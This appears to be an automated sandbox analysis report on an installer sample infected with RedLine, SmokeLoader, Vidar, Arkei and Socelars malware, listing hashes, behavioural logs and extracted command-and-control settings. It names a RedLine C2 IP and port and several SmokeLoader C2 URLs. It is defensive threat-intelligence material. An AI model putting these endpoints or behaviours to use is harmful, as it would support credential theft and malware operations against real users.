Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
66s -
max time network
1166s -
platform
windows11_x64 -
resource
win11 -
submitted
07-10-2021 18:28
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
redline
media214
91.121.67.60:2151
Extracted
smokeloader
2020
http://fiskahlilian16.top/
http://paishancho17.top/
http://ydiannetter18.top/
http://azarehanelle19.top/
http://quericeriant20.top/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1444 4884 rundll32.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7524 4884 rundll32.exe 38 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral4/memory/4972-294-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/4972-295-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1ba-189.dat family_socelars behavioral4/files/0x000100000002b1ba-214.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
description pid Process procid_target PID 3548 created 4908 3548 WerFault.exe 108 PID 1164 created 2288 1164 WerFault.exe 101 PID 3240 created 3192 3240 WerFault.exe 111 PID 4040 created 4348 4040 WerFault.exe 136 PID 5044 created 4012 5044 z2E8PvIdDUT1UN282zxROevH.exe 109 -
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral4/memory/492-403-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei behavioral4/memory/5524-556-0x0000000000400000-0x0000000005487000-memory.dmp family_arkei -
Vidar Stealer 2 IoCs
resource yara_rule behavioral4/memory/3192-277-0x0000000004BD0000-0x0000000004CA6000-memory.dmp family_vidar behavioral4/memory/5508-487-0x0000000000E70000-0x0000000000F46000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x000100000002b1b1-162.dat aspack_v212_v242 behavioral4/files/0x00070000000280bd-165.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b1-163.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ab-158.dat aspack_v212_v242 behavioral4/files/0x00070000000280bd-164.dat aspack_v212_v242 behavioral4/files/0x00070000000280bd-157.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ab-156.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 47 IoCs
pid Process 1164 setup_installer.exe 1876 setup_install.exe 2288 Thu16205451b994.exe 4440 Thu166f9a8bbe80.exe 2696 Thu161580bf75.exe 2644 Thu16f584bd3686.exe 4012 Thu165bd34b1e1d4d81.exe 3408 Thu16f3de88a335950bb.exe 3192 Thu1628aafb3efd7c3d.exe 4908 Thu16466b26f8b7.exe 1500 Thu1653d94a8da.exe 5056 Thu167d514d2a7ac5a.exe 2560 Thu164ba03be19.exe 4976 Thu16f3de88a335950bb.tmp 1360 lBks8kf0i8is5oB59zHNckNP.exe 1488 Thu16f3de88a335950bb.tmp 5080 Conhost.exe 1336 twTtfAdLpgiNh5FPj0A3Gcxc.exe 4972 Thu164ba03be19.exe 3668 postback.exe 2340 FarLabUninstaller.exe 4044 NDP472-KB4054531-Web.exe 2156 Setup.exe 1360 lBks8kf0i8is5oB59zHNckNP.exe 492 RunDll32.exe 4928 WcVpRA6kvlzSEmdGvqjbB0Dn.exe 2292 l08VHlGOLkq0TzbCK9JiJJtg.exe 564 J1q35wdLcxMrnOSriyYy5IEs.exe 3344 ht4b1kMQDJTAQUu6jtvotLZc.exe 2752 w9BtWUc1JtGE8ctva5QgyyWI.exe 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe 5420 XFLr_FTQ.eXE 5496 OcEWcAnUdEdEvlsJaukOw_VW.exe 5508 GcleanerEU.exe 5536 WayqjmEj2Pq_PUl4bua9Hc2R.exe 5544 xI8yS68Tpu3kCNSU44QBhykw.exe 5560 S__npfqx6N5GczvFZe3z9Ey8.exe 5568 a41UKoB6rMkA7Wr31HaVnoPd.exe 5576 XYvz2d7hNO61WhDcadQ_hx8G.exe 5584 KdmvzomAEKR_2M6jz2bTNhF4.exe 5592 tI0JEeYCuX6F_Dz1vYAR787H.exe 5616 rHAI58nO1XJ3oqBogfiEKfPH.exe 5624 RunDll32.exe 5636 1iJ8eO2w6hONeHtu_Lt0y0Pp.exe 5524 HL0ONOO9xTh4E8f90wc3b06k.exe 5848 installer.exe 5900 aDLsKHQL9R.exE -
Sets service image path in registry 2 TTPs
-
Loads dropped DLL 12 IoCs
pid Process 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 4976 Thu16f3de88a335950bb.tmp 1488 Thu16f3de88a335950bb.tmp 4348 rundll32.exe 2156 Setup.exe 2156 Setup.exe 4508 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 151 ipinfo.io 181 ipinfo.io 391 ipinfo.io 36 ipinfo.io 150 ipinfo.io 297 ip-api.com 297 ipinfo.io 2 ip-api.com 2 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2560 set thread context of 4972 2560 Thu164ba03be19.exe 126 -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe WerFault.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe WerFault.exe File created C:\Program Files (x86)\FarLabUninstaller\is-4P4LK.tmp WerFault.exe File created C:\Program Files (x86)\FarLabUninstaller\is-05O94.tmp WerFault.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe OcEWcAnUdEdEvlsJaukOw_VW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe OcEWcAnUdEdEvlsJaukOw_VW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe OcEWcAnUdEdEvlsJaukOw_VW.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini OcEWcAnUdEdEvlsJaukOw_VW.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat WerFault.exe File created C:\Program Files (x86)\FarLabUninstaller\is-P226Q.tmp WerFault.exe File created C:\Program Files (x86)\FarLabUninstaller\is-D638H.tmp WerFault.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat WerFault.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst002.exe OcEWcAnUdEdEvlsJaukOw_VW.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp.tmp WerFault.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
pid pid_target Process procid_target 2352 2288 WerFault.exe 101 3912 4908 WerFault.exe 108 1228 3192 WerFault.exe 111 564 4348 WerFault.exe 136 5232 4012 WerFault.exe 109 5744 5848 WerFault.exe 184 1488 5508 WerFault.exe 170 4504 5544 WerFault.exe 180 5284 3344 WerFault.exe 158 5336 4928 WerFault.exe 154 4288 3940 WerFault.exe 243 5604 5744 WerFault.exe 247 4032 3064 WerFault.exe 242 7044 6476 WerFault.exe 286 6556 6492 WerFault.exe 302 3624 5468 WerFault.exe 307 7056 5968 WerFault.exe 312 6444 5508 WerFault.exe 336 7692 7556 WerFault.exe 374 8988 7896 WerFault.exe 383 -
Checks processor information in registry 2 TTPs 37 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 J1q35wdLcxMrnOSriyYy5IEs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier J1q35wdLcxMrnOSriyYy5IEs.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision J1q35wdLcxMrnOSriyYy5IEs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString J1q35wdLcxMrnOSriyYy5IEs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier J1q35wdLcxMrnOSriyYy5IEs.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz J1q35wdLcxMrnOSriyYy5IEs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 J1q35wdLcxMrnOSriyYy5IEs.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4552 schtasks.exe 1648 schtasks.exe 13356 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 5940 timeout.exe 3908 timeout.exe 5604 timeout.exe 3132 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU J1q35wdLcxMrnOSriyYy5IEs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS J1q35wdLcxMrnOSriyYy5IEs.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 4 IoCs
pid Process 2340 taskkill.exe 5908 taskkill.exe 5928 taskkill.exe 9816 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 389 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 393 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1816 powershell.exe 1816 powershell.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 4440 Thu166f9a8bbe80.exe 1816 powershell.exe 1816 powershell.exe 1336 twTtfAdLpgiNh5FPj0A3Gcxc.exe 1336 twTtfAdLpgiNh5FPj0A3Gcxc.exe 1336 twTtfAdLpgiNh5FPj0A3Gcxc.exe 1336 twTtfAdLpgiNh5FPj0A3Gcxc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSystemtimePrivilege 3060 svchost.exe Token: SeSystemtimePrivilege 3060 svchost.exe Token: SeIncBasePriorityPrivilege 3060 svchost.exe Token: SeCreateTokenPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 4012 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 4012 Thu165bd34b1e1d4d81.exe Token: 31 4012 Thu165bd34b1e1d4d81.exe Token: 32 4012 Thu165bd34b1e1d4d81.exe Token: 33 4012 Thu165bd34b1e1d4d81.exe Token: 34 4012 Thu165bd34b1e1d4d81.exe Token: 35 4012 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 2696 Thu161580bf75.exe Token: SeShutdownPrivilege 1540 svchost.exe Token: SeCreatePagefilePrivilege 1540 svchost.exe Token: SeShutdownPrivilege 1540 svchost.exe Token: SeCreatePagefilePrivilege 1540 svchost.exe Token: SeShutdownPrivilege 1540 svchost.exe Token: SeCreatePagefilePrivilege 1540 svchost.exe Token: SeRestorePrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 WerFault.exe Token: SeDebugPrivilege 2340 FarLabUninstaller.exe Token: SeRestorePrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 WerFault.exe Token: SeRestorePrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 WerFault.exe Token: SeBackupPrivilege 2352 